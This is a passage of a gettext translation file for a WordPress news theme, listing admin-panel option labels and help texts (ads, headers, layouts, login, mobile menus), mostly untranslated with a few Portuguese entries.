msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing " "for this category." msgstr "" #: backend/panels/blog-pages.php:692 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing." msgstr "" #: backend/panels/design.php:330 msgid "Input a custom crop size: width x height. For example: 300x200" msgstr "" #: backend/panels/single-post.php:498 msgid "Input a custom font size value (in px) for the single entry category." msgstr "" #: backend/panels/blog-pages.php:228 msgid "" "Input a custom font size value for the category heading (px) on the desktop." msgstr "" #: backend/category-settings.php:206 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default value." msgstr "" #: backend/panels/bookmark.php:541 backend/panels/single-post.php:1328 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default." msgstr "" #: backend/panels/header.php:603 msgid "Input a custom forget password URL if have." msgstr "" #: backend/panels/single-post.php:1754 msgid "" "Input a custom height value (px) for this bar. Leave blank to set it as the " "default." msgstr "" #: backend/panels/header.php:354 msgid "Input a custom height value for the mobile navigation, Default is 40px." msgstr "" #: backend/panels/header.php:596 msgid "Input a custom register URL if have." msgstr "" #: backend/panels/design.php:686 msgid "Input a custom round corner (in px) for your website." msgstr "" #: backend/panels/design.php:436 msgid "" "Input a custom time value to next a slide in milliseconds (default is 5000)." msgstr "" #: backend/panels/ads.php:495 msgid "" "Input a delay time (ms) value to show the slide up after the site loaded." msgstr "" #: backend/panels/adblock.php:34 msgid "Input a description for the adblock popup." msgstr "" #: backend/panels/ads.php:410 msgid "Input a description for the adverting box." msgstr "" #: backend/panels/header.php:566 msgid "" "Input a description for the login form. Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:278 msgid "Input a destination URL for the notification panel." msgstr "" #: backend/panels/footer.php:208 msgid "Input a font size value (in px) for the copy right text." msgstr "" #: backend/panels/footer.php:114 msgid "" "Input a font size value (in px) for the default menu widgets are displaying " "in the footer." msgstr "" #: backend/panels/footer.php:214 msgid "Input a font size value (in px) for the footer copyright menu." msgstr "" #: backend/panels/newsletter.php:56 msgid "Input a footer text for the box." msgstr "" #: backend/panels/header.php:188 msgid "Input a heading for displaying above the search form." msgstr "" #: backend/panels/blog-pages.php:2405 msgid "" "Input a heading for the 404 page. Leave this option blank to set it as the " "default." msgstr "" #: backend/panels/single-post.php:545 msgid "Input a heading for the highlights section if it is existing." msgstr "" #: backend/panels/header.php:559 msgid "Input a heading for the login form." msgstr "" #: backend/panels/blog-pages.php:205 msgid "" "Input a heading for the post listing. Leave blank to disable this section" msgstr "" #: backend/category-settings.php:183 msgid "" "Input a heading for the post listing. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:105 backend/panels/bookmark.php:448 #: backend/panels/bookmark.php:519 msgid "Input a heading for this section." msgstr "" #: backend/panels/single-post.php:1305 msgid "Input a heading for this section. Leave -1 to disable this heading." msgstr "" #: backend/panels/amp.php:98 backend/panels/footer.php:159 msgid "Input a height for value for the footer logo, Default is 50px." msgstr "" #: backend/panels/header-style.php:369 backend/panels/header-style.php:636 msgid "Input a max height value for the logo of this header. Default is 60." msgstr "" #: backend/panels/ads.php:201 backend/panels/ads.php:390 msgid "" "Input a max width value (in px) for your ad image, leave blank set full size." msgstr "" #: backend/panels/single-post.php:1133 msgid "Input a meta text for the sponsored posts." msgstr "" #: backend/panels/table-contents.php:126 msgid "" "Input a minimum value for total heading tags to show the table of contents " "box." msgstr "" #: backend/panels/newsletter.php:49 msgid "Input a newsletter shortcode." msgstr "" #: backend/single-metaboxes.php:581 msgid "Input a offer label (Call to action) for this product review." msgstr "" #: backend/panels/single-post.php:1276 msgid "Input a position (after x paragraphs) to display the related bõ." msgstr "" #: backend/panels/table-contents.php:142 msgid "" "Input a position (after x paragraphs) to display the table of contents box." msgstr "" #: backend/single-metaboxes.php:737 msgid "" "Input a position (after x paragraphs) to display the table of contents box. " "Leave blank to use the theme option setting, Set \"-1\" for displaying at " "the top." msgstr "" #: backend/panels/ads.php:429 backend/panels/amp.php:589 msgid "Input a position (after x paragraphs) to display your ads." msgstr "" #: backend/panels/header.php:589 msgid "Input a redirect URL when the user logged in." msgstr "" #: backend/panels/single-post.php:1267 msgid "Input a related shortcode you want to display." msgstr "" #: backend/single-metaboxes.php:173 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this page, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:950 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this post, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:627 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "blog page." msgstr "" #: backend/panels/blog-pages.php:61 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "category pages." msgstr "" #: backend/panels/blog-pages.php:1945 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "search page." msgstr "" #: backend/category-settings.php:65 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this category. Leave blank to use the above setting." msgstr "" #: backend/single-metaboxes.php:122 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. Leave this option blank to set as the above setting." msgstr "" #: backend/single-metaboxes.php:899 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. This setting requests to select \"Use Ruby Template\" in site " "header setting in order to work." msgstr "" #: backend/panels/header.php:60 msgid "Input a Ruby Template shortcode for displaying as the website header." msgstr "" #: backend/single-metaboxes.php:541 msgid "" "Input a short description to display before the review score, For example: " "Good, Bad..." msgstr "" #: backend/single-metaboxes.php:668 msgid "" "Input a starting view value for this post. Leave blank if you want to " "display real data." msgstr "" #: backend/single-metaboxes.php:199 msgid "" "Input a tagline for this post, It will display under the single post title." msgstr "" #: backend/panels/ads.php:470 msgid "" "Input a template shortcode or any other shortcode you would like to show in " "this section." msgstr "" #: backend/panels/adblock.php:27 msgid "Input a title for the adblock popup." msgstr "" #: backend/panels/reaction.php:32 msgid "" "Input a title for the reaction section. Leave blank to set it as the default." msgstr "" #: backend/single-metaboxes.php:497 msgid "Input a title for this review section." msgstr "" #: backend/panels/design.php:69 msgid "" "Input a value to limited numbers of entry category show on all post listing " "layout, useful in case you have many categories per post." msgstr "" #: backend/mega-menu.php:205 msgid "" "Input a width value (in px) for this mega section. Leave blank or 0 to set " "to full width." msgstr "" #: backend/panels/header.php:142 msgid "" "Input a width value (in px) for this section. Leave blank to set a the " "default." msgstr "" #: backend/single-metaboxes.php:547 msgid "Input advantages for this review." msgstr "" #: backend/mega-menu.php:243 msgid "Input attachment image/SVG url to show your icon." msgstr "" #: backend/single-metaboxes.php:259 msgid "Input attribution for the featured image." msgstr "" #: backend/single-metaboxes.php:252 msgid "Input caption text for the featured image." msgstr "" #: backend/panels/header-style.php:629 msgid "" "Input custom height value (px) for the navigation bar of this header. " "Default is 40px." msgstr "" #: backend/panels/header-style.php:362 msgid "Input custom height value (px) for the navigation bar. Default is 40." msgstr "" #: backend/panels/header-style.php:81 msgid "Input custom height value (px) for this header. Default is 60." msgstr "" #: backend/category-settings.php:337 backend/panels/blog-pages.php:359 #: backend/panels/blog-pages.php:846 backend/panels/blog-pages.php:1260 #: backend/panels/blog-pages.php:1668 backend/panels/blog-pages.php:2160 #: backend/panels/bookmark.php:259 backend/panels/bookmark.php:707 msgid "" "Input custom ratio percent (height*100/width) for featured image you would " "like. For example: 50" msgstr "" #: backend/panels/general.php:35 msgid "" "Input default placeholder text for the search form, leave blank to set it as " "the default." msgstr "" #: backend/panels/newsletter.php:42 msgid "Input description for the popup newsletter form" msgstr "" #: backend/panels/bookmark.php:112 backend/panels/bookmark.php:455 msgid "Input description for this section." msgstr "" #: backend/single-metaboxes.php:561 msgid "Input disadvantages for this review." msgstr "" #: backend/category-settings.php:488 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:513 backend/panels/blog-pages.php:1000 #: backend/panels/blog-pages.php:1414 backend/panels/blog-pages.php:1822 #: backend/panels/blog-pages.php:2314 backend/panels/bookmark.php:860 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:480 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:505 backend/panels/blog-pages.php:992 #: backend/panels/blog-pages.php:1406 backend/panels/blog-pages.php:1814 #: backend/panels/blog-pages.php:2306 backend/panels/bookmark.php:852 #: backend/panels/single-post.php:609 backend/panels/single-post.php:618 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:359 msgid "" "Input entry meta tags to show. Separated by commas (for example: author,date)" ". All meta keys include: [author, date, category, tag, view, comment, update," " read, custom]" msgstr "" #: backend/single-metaboxes.php:575 msgid "Input final summary for this review." msgstr "" #: backend/panels/typography.php:587 msgid "Input Font Settings" msgstr "" #: backend/single-metaboxes.php:757 msgid "Input Heading" msgstr "" #: backend/single-metaboxes.php:206 msgid "" "Input highlights for this post. This section will appear a the top of " "content. To edit this section heading, Navigate to Theme Options > Single " "Post > Tagline & highlights" msgstr "" #: backend/single-metaboxes.php:393 msgid "Input iframe embed code if WordPress cannot support your audio URL." msgstr "" #: backend/single-metaboxes.php:345 msgid "Input iframe embed code if WordPress cannot support your video URL." msgstr "" #: backend/panels/bookmark.php:72 msgid "" "Input max expiration (days) to save bookmarks for the guest users. Set 0 for " "no expiration." msgstr "" #: backend/panels/design.php:166 msgid "" "Input number of words per minute to calculate the reading time. Default is " "130" msgstr "" #: backend/single-metaboxes.php:599 msgid "Input the currency of the price." msgstr "" #: backend/panels/amp.php:313 backend/panels/amp.php:373 #: backend/panels/amp.php:433 backend/panels/amp.php:494 #: backend/panels/amp.php:554 msgid "Input the data-ad-client number ID (without ca-pub-)." msgstr "" #: backend/panels/amp.php:321 backend/panels/amp.php:381 #: backend/panels/amp.php:441 backend/panels/amp.php:502 #: backend/panels/amp.php:562 msgid "Input the data-ad-slot number ID." msgstr "" #: backend/single-metaboxes.php:587 msgid "Input the destination URL of the offer." msgstr "" #: backend/panels/bookmark.php:478 msgid "Input the follow page URL for user can redirect to add their interests." msgstr "" #: backend/panels/header.php:157 backend/panels/header.php:389 msgid "" "Input the footer copyright text to display at the bottom of this section, " "allow raw HTML." msgstr "" #: backend/single-metaboxes.php:751 msgid "" "Input the heading for each page corresponding to the page break tags. Please " "input all headings for pages to show the section." msgstr "" #: backend/panels/table-contents.php:133 msgid "Input the heading for the table of contents box." msgstr "" #: backend/panels/design.php:238 msgid "Input the label for this meta." msgstr "" #: backend/panels/socials.php:190 backend/panels/socials.php:217 #: backend/panels/socials.php:244 msgid "Input the name of font icon, for example: \"fab fa-facebook\"." msgstr "" #: backend/panels/socials.php:184 backend/panels/socials.php:211 #: backend/panels/socials.php:238 msgid "Input the name of the social, for example: facebook, twitter." msgstr "" #: backend/single-metaboxes.php:772 msgid "" "Input the post source if it has, it will display at the bottom of post " "content" msgstr "" #: backend/single-metaboxes.php:793 msgid "" "Input the post via if it has, it will display at the bottom of post content" msgstr "" #: backend/single-metaboxes.php:593 msgid "Input the price of the offer." msgstr "" #: backend/panels/design.php:544 msgid "" "Input the read more label to display on your website. Default is \"Read " "More\"." msgstr "" #: backend/panels/bookmark.php:64 msgid "" "Input the redirect URL when user logged. Leave this option blank to set the " "default value." msgstr "" #: backend/single-metaboxes.php:630 msgid "Input the sponsor brand name for this post" msgstr "" #: backend/single-metaboxes.php:623 msgid "Input the sponsor website URL." msgstr "" #: backend/panels/newsletter.php:35 msgid "Input title for the popup newsletter form" msgstr "" #: backend/single-metaboxes.php:290 msgid "" "Input value or text for the custom meta that you created in Theme Options " "panel." msgstr "" #: backend/panels/single-post.php:349 msgid "Input your a description for your newsletter." msgstr "" #: backend/panels/single-post.php:342 msgid "Input your a heading for your newsletter section." msgstr "" #: backend/panels/single-post.php:356 msgid "" "Input your a newsletter (subscribe) shortcode or script to show at bottom " "entry content." msgstr "" #: backend/panels/ads.php:194 backend/panels/ads.php:383 msgid "Input your ad destination URL." msgstr "" #: backend/panels/ads.php:123 msgid "Input your ad script code." msgstr "" #: backend/panels/header.php:667 msgid "Input your alert content to show." msgstr "" #: backend/panels/header.php:674 msgid "Input your alert URL." msgstr "" #: backend/panels/amp.php:262 msgid "Input your amp auto ads code." msgstr "" #: backend/panels/amp.php:341 backend/panels/amp.php:401 #: backend/panels/amp.php:461 backend/panels/amp.php:522 #: backend/panels/amp.php:582 msgid "Input your AMP custom ad script." msgstr "" #: backend/single-metaboxes.php:387 msgid "" "Input your audio URL, support: SoundCloud, MixCloud. Do not forget to check " "\"Audio\" in Post Format section." msgstr "" #: backend/panels/ads.php:50 msgid "Input your auto ads code." msgstr "" #: backend/panels/optimized.php:203 msgid "input your company city and country address." msgstr "" #: backend/panels/optimized.php:217 msgid "input your company local postal code." msgstr "" #: backend/panels/optimized.php:196 msgid "input your company main email." msgstr "" #: backend/panels/optimized.php:189 msgid "input your company phone number." msgstr "" #: backend/panels/optimized.php:210 msgid "input your company street address." msgstr "" #: backend/panels/footer.php:192 msgid "input your copyright text or HTML." msgstr "" #: backend/panels/ads.php:312 msgid "Input your custom ad script code or Adsense." msgstr "" #: backend/panels/design.php:245 msgid "" "Input your custom CSS icon classname to display at the beginning of the meta." msgstr "" #: backend/panels/blog-pages.php:2412 msgid "" "Input your description for the 404 page. Leave this option blank to set it " "as the default." msgstr "" #: backend/panels/optimized.php:245 msgid "input your facebook app ID for OG tags." msgstr "" #: backend/panels/single-post.php:363 msgid "Input your policy text for the newsletter form, row HTML allowed." msgstr "" #: backend/panels/privacy.php:34 msgid "Input your privacy or cookie content for your website, allow raw HTML." msgstr "" #: backend/panels/socials.php:29 backend/panels/socials.php:36 #: backend/panels/socials.php:43 backend/panels/socials.php:50 #: backend/panels/socials.php:56 backend/panels/socials.php:63 #: backend/panels/socials.php:69 backend/panels/socials.php:75 #: backend/panels/socials.php:81 backend/panels/socials.php:87 #: backend/panels/socials.php:93 backend/panels/socials.php:99 #: backend/panels/socials.php:105 backend/panels/socials.php:111 #: backend/panels/socials.php:117 backend/panels/socials.php:123 #: backend/panels/socials.php:129 backend/panels/socials.php:135 #: backend/panels/socials.php:141 backend/panels/socials.php:147 #: backend/panels/socials.php:153 msgid "Input your social profile URL, Leave blank if you want to disable it." msgstr "" #: backend/panels/socials.php:178 backend/panels/socials.php:205 #: backend/panels/socials.php:232 msgid "Input your social profile URL." msgstr "" #: backend/panels/woocommerce.php:61 msgid "" "Input your template shortcode you would like to use Elementor builder to " "create a featured section at the top of shop page." msgstr "" #: backend/panels/footer.php:122 msgid "Input your template shortcode you would like to use Elementor builder." msgstr "" #: backend/single-metaboxes.php:332 msgid "Input your video link, support: Youtube, Vimeo, DailyMotion." msgstr "" #: backend/panels/typography.php:578 msgid "Inputs & Button" msgstr "" #: templates/parts.php:603 msgid "Instagram" msgstr "" #: backend/panels/socials.php:49 msgid "Instagram URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2811 msgid "Install" msgstr "" #: backend/class-tgm-plugin-activation.php:2697 #, php-format msgid "Install %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:340 backend/install-plugins.php:67 msgid "Install Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:339 backend/install-plugins.php:66 msgid "Install Required Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:2413 msgid "Installed But Not Activated" msgstr "" #: backend/class-tgm-plugin-activation.php:2584 msgid "Installed version:" msgstr "" #: backend/class-tgm-plugin-activation.php:3606 #, php-format msgid "Installing and Activating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:3614 #, php-format msgid "Installing Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:342 backend/install-plugins.php:68 #, php-format msgid "Installing Plugin: %s" msgstr "" #: backend/panels/logo.php:159 msgid "iOS Bookmarklet Icon" msgstr "" #: backend/single-metaboxes.php:276 msgid "" "It is useful in case this post has a lot of categories and you want to " "display only one in listings." msgstr "" #: templates/blog.php:19 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "" #: templates/page.php:124 msgid "" "It looks like nothing was found at this location. The page you were looking " "for does not exist or was loading incorrectly." msgstr "" #: templates/blog.php:501 msgid "" "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "" "Parece que não conseguimos encontrar o que você está procurando. Talvez " "pesquisar possa ajudar." #: backend/panels/footer.php:55 msgid "It will be helpful if you have not set up footer background." msgstr "" #: backend/single-metaboxes.php:552 backend/single-metaboxes.php:566 msgid "Item" msgstr "" #: backend/single-metaboxes.php:521 msgid "Item Label" msgstr "" #: backend/panels/optimized.php:144 msgid "ItemList (Carousel) Markup" msgstr "" #: backend/panels/newsletter.php:36 msgid "Join Us!" msgstr "" #: backend/panels/reaction.php:53 msgid "Joy" msgstr "" #: includes/fallbacks.php:167 msgid "k" msgstr "" #: backend/configs.php:857 msgid "Large Leaderboard (970x90)" msgstr "" #: backend/configs.php:853 msgid "Large Rectangle (336x280)" msgstr "" #: backend/panels/single-post.php:632 backend/panels/single-post.php:638 msgid "Last Updated Date" msgstr "" #: includes/menu.php:325 templates/header/templates.php:727 msgid "Latest News" msgstr "" #: backend/category-settings.php:177 backend/panels/blog-pages.php:195 msgid "Latest Posts - Heading" msgstr "" #: backend/category-settings.php:233 backend/panels/blog-pages.php:244 msgid "Latest Posts - Layout" msgstr "" #: backend/category-settings.php:213 backend/panels/blog-pages.php:541 msgid "Latest Posts - Pagination" msgstr "" #: backend/category-settings.php:290 backend/panels/blog-pages.php:298 msgid "Latest Posts - Sidebar" msgstr "" #: backend/panels/bookmark.php:589 msgid "Layout" msgstr "" #: backend/panels/table-contents.php:110 backend/single-metaboxes.php:722 msgid "layout" msgstr "" #: backend/configs.php:107 backend/configs.php:638 backend/configs.php:697 #: backend/configs.php:736 backend/configs.php:775 msgid "Layout 1" msgstr "" #: backend/configs.php:120 msgid "Layout 1 - Center" msgstr "" #: backend/configs.php:116 msgid "Layout 10" msgstr "" #: backend/configs.php:129 msgid "Layout 10 - Center" msgstr "" #: backend/configs.php:117 msgid "Layout 11" msgstr "" #: backend/configs.php:130 msgid "Layout 11 - Center" msgstr "" #: backend/configs.php:118 msgid "Layout 12" msgstr "" #: backend/configs.php:131 msgid "Layout 12 - Center" msgstr "" #: backend/configs.php:119 msgid "Layout 13" msgstr "" #: backend/configs.php:132 msgid "Layout 13 - Center" msgstr "" #: backend/configs.php:108 backend/configs.php:642 backend/configs.php:701 #: backend/configs.php:740 backend/configs.php:779 msgid "Layout 2" msgstr "" #: backend/configs.php:121 msgid "Layout 2 - Center" msgstr "" #: backend/configs.php:109 backend/configs.php:646 backend/configs.php:705 #: backend/configs.php:744 backend/configs.php:783 msgid "Layout 3" msgstr "" #: backend/configs.php:122 msgid "Layout 3 - Center" msgstr "" #: backend/configs.php:110 backend/configs.php:650 backend/configs.php:709 #: backend/configs.php:748 msgid "Layout 4" msgstr "" #: backend/configs.php:123 msgid "Layout 4 - Center" msgstr "" #: backend/configs.php:111 backend/configs.php:654 msgid "Layout 5" msgstr "" #: backend/configs.php:124 msgid "Layout 5 - Center" msgstr "" #: backend/configs.php:112 backend/configs.php:658 msgid "Layout 6" msgstr "" #: backend/configs.php:125 msgid "Layout 6 - Center" msgstr "" #: backend/configs.php:113 backend/configs.php:662 msgid "Layout 7" msgstr "" #: backend/configs.php:126 msgid "Layout 7 - Center" msgstr "" #: backend/configs.php:114 backend/configs.php:666 msgid "Layout 8" msgstr "" #: backend/configs.php:127 msgid "Layout 8 - Center" msgstr "" #: backend/configs.php:115 msgid "Layout 9" msgstr "" #: backend/configs.php:128 msgid "Layout 9 - Center" msgstr "" #: backend/panels/login.php:20 backend/panels/table-contents.php:105 msgid "Layout Settings" msgstr "" #: backend/panels/single-post.php:28 msgid "Layouts" msgstr "" #: backend/panels/optimized.php:27 msgid "Lazy Load Featured Image" msgstr "" #: backend/configs.php:842 msgid "Leaderboard (728x90)" msgstr "" #: includes/actions.php:55 templates/single/review-comment.php:97 #: templates/single/templates.php:906 msgid "Leave a comment" msgstr "Deixe um comentário" #: templates/single/review-comment.php:50 msgid "Leave a reply" msgstr "" #: templates/single/review-comment.php:49 templates/single/templates.php:883 msgid "Leave a review" msgstr "" #: backend/panels/amp.php:287 msgid "Leave blank AMP auto ads if you would like to use the ad units." msgstr "" #: backend/panels/footer.php:115 backend/panels/footer.php:215 msgid "" "Leave blank if you use the \"Archive & Menu Widgets\" font size setting." msgstr "" #: backend/panels/blog-pages.php:694 msgid "" "Leave this option blank if you want to use standard blog layout settings." msgstr "" #: backend/panels/block-classic.php:92 backend/panels/block-grid.php:92 #: backend/panels/block-grid.php:257 backend/panels/block-grid.php:422 #: backend/panels/block-grid.php:595 backend/panels/block-grid.php:782 #: backend/panels/block-list.php:100 backend/panels/block-list.php:273 #: backend/panels/block-list.php:454 backend/panels/block-list.php:649 #: backend/panels/blog-pages.php:437 backend/panels/blog-pages.php:924 #: backend/panels/blog-pages.php:1338 backend/panels/blog-pages.php:1746 #: backend/panels/blog-pages.php:2238 backend/panels/bookmark.php:336 #: backend/panels/bookmark.php:784 msgid "Leave this option blank or set 0 to disable." msgstr "" #: backend/panels/login.php:59 msgid "Leave this option blank to redirect to the homepage." msgstr "" #: backend/panels/login.php:105 backend/panels/login.php:113 msgid "Leave this option blank to set the default value." msgstr "" #: backend/panels/ads.php:53 msgid "Leave this option blank to use unit ads code." msgstr "" #: backend/configs.php:175 backend/configs.php:544 backend/configs.php:823 msgid "Left" msgstr "" #: backend/configs.php:336 msgid "Left Dot" msgstr "" #: backend/panels/footer.php:46 msgid "Left Dotted Style" msgstr "" #: backend/panels/header.php:343 msgid "Left Logo" msgstr "" #: backend/panels/header.php:345 msgid "Left Logo 2" msgstr "" #: backend/mega-menu.php:156 backend/panels/footer.php:66 #: backend/panels/header-style.php:92 backend/panels/header-style.php:380 #: backend/panels/header-style.php:647 backend/panels/header.php:289 msgid "Light Text" msgstr "" #: backend/panels/design.php:574 msgid "Link Hover Effect" msgstr "" #: backend/panels/single-post.php:759 backend/panels/single-post.php:898 #: backend/panels/single-post.php:1036 backend/panels/single-post.php:1665 #: templates/parts.php:606 msgid "LinkedIn" msgstr "" #: backend/panels/socials.php:62 msgid "LinkedIn URL" msgstr "" #: backend/panels/block-list.php:27 backend/panels/block-list.php:200 msgid "list" msgstr "" #: backend/category-settings.php:249 msgid "List 1" msgstr "" #: backend/configs.php:471 backend/panels/block-list.php:17 msgid "List 1 (Standard)" msgstr "" #: backend/category-settings.php:250 backend/configs.php:475 #: backend/panels/block-list.php:190 msgid "List 2" msgstr "" #: templates/single/templates.php:1341 msgid "List of Images" msgstr "" #: backend/panels/header.php:215 msgid "Live Search Result" msgstr "" #: backend/panels/design.php:711 msgid "Load Font Awesome" msgstr "" #: backend/panels/design.php:712 msgid "" "Load font Awesome icons library to your website. This will help you can " "embed this font icons to your widgets and content." msgstr "" #: backend/panels/design.php:706 msgid "" "Load font Awesome icons library. Enabling this option may affect to the site " "performance." msgstr "" #: backend/configs.php:562 backend/panels/bookmark.php:574 msgid "Load More (Ajax)" msgstr "" #: backend/panels/optimized.php:202 msgid "Locality Address" msgstr "" #: backend/panels/login.php:36 msgid "Login Form Position" msgstr "" #: backend/panels/login.php:51 msgid "Login Logo" msgstr "" #: backend/panels/bookmark.php:63 backend/panels/header.php:588 #: backend/panels/login.php:103 msgid "Login Redirect URL" msgstr "" #: backend/panels/login.php:12 msgid "Login Screen" msgstr "" #: backend/panels/login.php:66 msgid "Login Screen Background" msgstr "" #: backend/panels/login.php:79 msgid "Login Screen Color" msgstr "" #: backend/panels/logo.php:16 msgid "Logo" msgstr "" #: backend/panels/login.php:57 msgid "Logo - Destination URL" msgstr "" #: backend/panels/amp.php:97 backend/panels/footer.php:158 msgid "Logo Height" msgstr "" #: backend/panels/header-style.php:368 backend/panels/header-style.php:635 msgid "Logo Max Height" msgstr "" #: backend/panels/header.php:618 backend/panels/login.php:111 msgid "Logout Redirect URL" msgstr "" #: templates/popup.php:208 msgid "Lost your password?" msgstr "" #: backend/panels/reaction.php:42 msgid "Love" msgstr "" #: includes/fallbacks.php:165 msgid "M" msgstr "" #: backend/panels/logo.php:46 msgid "Main Logo" msgstr "" #: backend/panels/typography.php:902 functions.php:56 #: templates/header/templates.php:241 msgid "Main Menu" msgstr "" #: templates/header/templates.php:248 msgid "main menu" msgstr "" #: backend/panels/sidebar.php:48 msgid "Making sidebars permanently visible when scrolling up and down." msgstr "" #: backend/category-settings.php:312 msgid "Making this sidebar permanently visible when scrolling up and down." msgstr "" #: backend/mega-menu.php:288 includes/fallbacks.php:274 msgid "Manage Locations" msgstr "" #: backend/panels/page.php:42 backend/panels/single-post.php:182 #: backend/single-metaboxes.php:69 msgid "Max Width Content without Sidebar" msgstr "" #: backend/panels/design.php:68 msgid "Maximum Entry Categories" msgstr "" #: backend/configs.php:852 msgid "Medium Rectangle (300x250)" msgstr "" #: backend/mega-menu.php:124 backend/mega-menu.php:165 msgid "Mega Menu" msgstr "" #: backend/panels/header-style.php:88 backend/panels/header-style.php:376 #: backend/panels/header-style.php:643 msgid "Mega Menu - Text Color Scheme" msgstr "" #: backend/panels/typography.php:908 msgid "Menu Font" msgstr "" #: backend/panels/design.php:592 msgid "Menu Hover Effect" msgstr "" #: backend/mega-menu.php:234 msgid "Menu Icon" msgstr "" #: backend/single-metaboxes.php:540 msgid "Meta Description" msgstr "" #: backend/panels/design.php:244 msgid "Meta Icon ClassName" msgstr "" #: backend/panels/design.php:237 msgid "Meta Label" msgstr "" #: backend/panels/design.php:254 msgid "Meta Label Position" msgstr "" #: backend/panels/logo.php:167 msgid "Metro UI Bookmarklet Icon" msgstr "" #: backend/panels/header.php:729 msgid "Mini Cart" msgstr "" #: backend/class-tgm-plugin-activation.php:2592 msgid "Minimum required version:" msgstr "" #: backend/panels/color.php:118 msgid "Miscellaneous" msgstr "" #: backend/category-settings.php:487 backend/panels/block-classic.php:147 #: backend/panels/block-grid.php:147 backend/panels/block-grid.php:312 #: backend/panels/block-grid.php:477 backend/panels/block-grid.php:650 #: backend/panels/block-grid.php:837 backend/panels/block-list.php:155 #: backend/panels/block-list.php:328 backend/panels/block-list.php:509 #: backend/panels/block-list.php:704 backend/panels/blog-pages.php:512 #: backend/panels/blog-pages.php:999 backend/panels/blog-pages.php:1413 #: backend/panels/blog-pages.php:1821 backend/panels/blog-pages.php:2313 #: backend/panels/bookmark.php:859 backend/panels/single-post.php:608 #: backend/panels/single-post.php:617 msgid "Mobile - Hide Entry Meta" msgstr "" #: backend/category-settings.php:457 backend/panels/blog-pages.php:482 #: backend/panels/blog-pages.php:969 backend/panels/blog-pages.php:1383 #: backend/panels/blog-pages.php:1791 backend/panels/blog-pages.php:2283 #: backend/panels/bookmark.php:381 backend/panels/bookmark.php:829 msgid "Mobile - Title Font Size" msgstr "" #: backend/configs.php:859 msgid "Mobile Banner (320x100)" msgstr "" #: backend/configs.php:856 msgid "Mobile Banner (320x50)" msgstr "" #: backend/panels/typography.php:52 backend/panels/typography.php:98 #: backend/panels/typography.php:147 backend/panels/typography.php:196 #: backend/panels/typography.php:245 backend/panels/typography.php:294 #: backend/panels/typography.php:343 backend/panels/typography.php:392 #: backend/panels/typography.php:441 backend/panels/typography.php:507 #: backend/panels/typography.php:555 backend/panels/typography.php:610 #: backend/panels/typography.php:653 backend/panels/typography.php:729 #: backend/panels/typography.php:786 backend/panels/typography.php:870 #: backend/panels/typography.php:1056 backend/panels/typography.php:1128 msgid "Mobile Font Size" msgstr "" #: backend/configs.php:860 msgid "Mobile Friendly (300x100)" msgstr "" #: backend/panels/header.php:306 msgid "Mobile Header" msgstr "" #: backend/panels/header.php:746 msgid "Mobile Header - Mini Cart" msgstr "" #: backend/panels/header.php:237 msgid "Mobile Header - Search Icon" msgstr "" #: backend/panels/header.php:540 msgid "Mobile Header - Sign In" msgstr "" #: backend/panels/header.php:402 msgid "Mobile Header Colors" msgstr "" #: backend/panels/header.php:340 msgid "Mobile Header Layout" msgstr "" #: backend/panels/header.php:333 msgid "Mobile Header Style" msgstr "" #: backend/panels/logo.php:95 msgid "Mobile Logo" msgstr "" #: backend/panels/logo.php:85 msgid "Mobile Logos" msgstr "" #: backend/panels/typography.php:947 functions.php:57 #: templates/header/templates.php:609 msgid "Mobile Menu" msgstr "" #: backend/panels/typography.php:953 msgid "Mobile Menu Font" msgstr "" #: backend/panels/header.php:353 msgid "Mobile Navigation Height" msgstr "" #: backend/panels/typography.php:992 functions.php:58 msgid "Mobile Quick Access" msgstr "" #: backend/panels/typography.php:998 msgid "Mobile Quick Access Menu Font" msgstr "" #: backend/panels/color.php:102 msgid "Mode Switcher - Dark Icon Background" msgstr "" #: backend/panels/color.php:94 msgid "Mode Switcher - Light Icon Color" msgstr "" #: templates/header/templates.php:421 msgid "More" msgstr "" #: backend/panels/header.php:222 msgid "More Menu - Search Form" msgstr "" #: backend/panels/header-style.php:29 backend/panels/header-style.php:323 #: backend/panels/header-style.php:574 msgid "More Menu Button" msgstr "" #: backend/panels/header.php:112 msgid "More Menu Item" msgstr "" #: includes/sidebars.php:86 msgid "More Menu Section" msgstr "" #: 